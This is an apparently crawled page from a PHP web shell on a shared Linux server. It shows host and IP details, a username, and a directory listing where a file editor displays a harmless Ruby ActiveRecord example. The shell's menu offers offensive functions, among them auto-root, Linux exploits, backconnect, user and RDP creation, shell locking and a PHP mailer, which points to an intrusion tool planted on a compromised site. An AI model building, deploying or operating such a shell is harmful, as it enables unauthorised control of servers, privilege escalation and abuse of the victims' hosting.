Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
ruby-activerecord /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
performance.rb
4.66
KB
-rw-r--r--
simple.rb
336
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : simple.rb
# frozen_string_literal: true require "active_record" class Person < ActiveRecord::Base establish_connection adapter: "sqlite3", database: "foobar.db" connection.create_table table_name, force: true do |t| t.string :name end end bob = Person.create!(name: "bob") puts Person.all.inspect bob.destroy puts Person.all.inspect
Close